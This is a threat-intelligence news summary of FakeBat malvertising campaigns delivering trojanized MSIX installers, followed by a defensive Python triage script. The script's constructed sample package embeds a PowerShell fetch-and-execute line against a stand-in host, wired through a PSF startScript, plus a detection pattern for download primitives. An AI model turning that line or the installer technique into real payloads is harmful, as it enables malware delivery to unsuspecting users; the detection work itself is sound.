August 19, 2024 at 09:15AM
Cybersecurity researchers have observed a surge in malware infections driven by malvertising campaigns that distribute a loader called FakeBat. The campaigns target users searching for popular business software, serve them trojanized MSIX installers, and run a PowerShell script from the installer to fetch a secondary payload. FakeBat is attributed to the threat actor Eugenfest and is used to deliver a range of malware families.
Key takeaways:
– Cybersecurity researchers have uncovered a surge in malware infections from malvertising campaigns distributing a loader called FakeBat, also known as EugenLoader and PaykLoader, attributed to the threat actor named Eugenfest and tracked under the name NUMOZYLOD by Google’s threat intelligence team.
– The malware utilizes trojanized MSIX installers to execute a PowerShell script and download a secondary payload, propagating through drive-by download techniques.
– FakeBat disguises its MSIX installers as popular software such as Brave, KeePass, Notion, Steam, and Zoom. The packages abuse the MSIX Package Support Framework (PSF) startScript configuration, which lets a script run before the main application is launched, so the victim sees the expected program start while the loader has already executed.
– UNC4536 leverages malvertising to distribute these trojanized MSIX installers and acts as a malware distributor, utilizing FakeBat as a delivery vehicle for next-stage payloads for partners, including FIN7.
– The malware gathers system information and establishes persistence by creating a shortcut (.lnk) in the user's Startup folder.
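The takeaways above describe the delivery chain (trojanized MSIX, PSF startScript, PowerShell downloader) but not how a defender would check an installer for it. The following is an added example, not code from the original report or from any vendor tooling: it builds a constructed, in-memory MSIX-like package (an MSIX is a zip archive carrying AppxManifest.xml and, when PSF is used, a config.json) and triages it for a PSF startScript or endScript entry whose script contains download primitives. The package contents, the script name stage1.ps1, the URL, and the function names are all hypothetical.

```python
"""Triage an MSIX package for a Package Support Framework (PSF) start/end script.

Added example: constructs a sample package in memory and inspects it; nothing here
is a real FakeBat sample. An MSIX is a zip archive; PSF reads config.json from the
package root and runs the script named by startScript before the real executable.
"""
import io
import json
import re
import zipfile

# PowerShell primitives commonly used by a first-stage downloader (constructed list).
DOWNLOAD_PATTERNS = re.compile(
    r"Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient|"
    r"Start-BitsTransfer|Invoke-RestMethod|\biwr\b|\bcurl\b",
    re.IGNORECASE,
)

# PSF executes scripts from these per-application config keys.
PSF_SCRIPT_KEYS = ("startScript", "endScript")


def build_sample_msix(trojanized: bool = True) -> bytes:
    """Constructed MSIX-like package. With trojanized=True it is wired like the
    installers described in the report: the manifest launches PsfLauncher64.exe,
    and config.json tells PSF to run stage1.ps1 before the genuine app starts."""
    exe = "PsfLauncher64.exe" if trojanized else "VFS/ProgramFilesX64/RealApp/RealApp.exe"
    manifest = f"""<?xml version="1.0" encoding="utf-8"?>
<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10">
  <Identity Name="Example.App" Publisher="CN=Example" Version="1.0.0.0"/>
  <Applications>
    <Application Id="App" Executable="{exe}" EntryPoint="Windows.FullTrustApplication"/>
  </Applications>
</Package>"""
    # Hypothetical downloader: fetch a second stage and pipe it to Invoke-Expression.
    script = "$u='https://example.invalid/stage2';(New-Object Net.WebClient).DownloadString($u)|iex\n"
    config = {
        "applications": [{
            "id": "App",
            "executable": "VFS/ProgramFilesX64/RealApp/RealApp.exe",
            "startScript": {
                "scriptPath": "stage1.ps1",
                "waitForScriptToFinish": True,
                "showWindow": False,
            },
        }]
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AppxManifest.xml", manifest)
        z.writestr("VFS/ProgramFilesX64/RealApp/RealApp.exe", b"MZ")  # placeholder, not a real PE
        if trojanized:
            z.writestr("config.json", json.dumps(config))
            z.writestr("stage1.ps1", script)
            z.writestr("PsfLauncher64.exe", b"MZ")  # placeholder, not a real PE
    return buf.getvalue()


def triage_msix(msix_bytes: bytes) -> list:
    """Return one finding per PSF start/end script declared in the package.
    Each finding records the app id, the script path, whether the script file is
    actually shipped, whether PSF will block on it, whether the manifest hands
    control to the PSF launcher, and whether the script body contains
    download primitives."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(msix_bytes)) as z:
        names = set(z.namelist())
        manifest = z.read("AppxManifest.xml").decode("utf-8", "replace") if "AppxManifest.xml" in names else ""
        uses_psf_launcher = "psflauncher" in manifest.lower()
        if "config.json" not in names:
            return findings  # no PSF config: nothing for startScript to run
        cfg = json.loads(z.read("config.json").decode("utf-8", "replace"))
        for app in cfg.get("applications", []):
            for key in PSF_SCRIPT_KEYS:
                spec = app.get(key)
                if not spec:
                    continue
                path = spec.get("scriptPath", "")
                body = z.read(path).decode("utf-8", "replace") if path in names else ""
                findings.append({
                    "app_id": app.get("id", ""),
                    "hook": key,
                    "script_path": path,
                    "script_present": path in names,
                    "waits_for_script": bool(spec.get("waitForScriptToFinish", False)),
                    "uses_psf_launcher": uses_psf_launcher,
                    "download_indicators": sorted({m.group(0) for m in DOWNLOAD_PATTERNS.finditer(body)}),
                })
    return findings


if __name__ == "__main__":
    for finding in triage_msix(build_sample_msix()):
        print(finding)
```

A startScript entry is not malicious by itself; legitimate packages repackaged with PSF use it for setup tasks. The combination worth escalating is a PSF launcher in the manifest plus a start script that reaches out to the network, which is why the finding carries both signals rather than a single verdict.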
Additionally, Mandiant previously detailed the attack lifecycle of another malware downloader, EMPTYSPACE, used by a financially motivated threat cluster tracked as UNC4990 that targets Italian entities for data exfiltration and cryptojacking.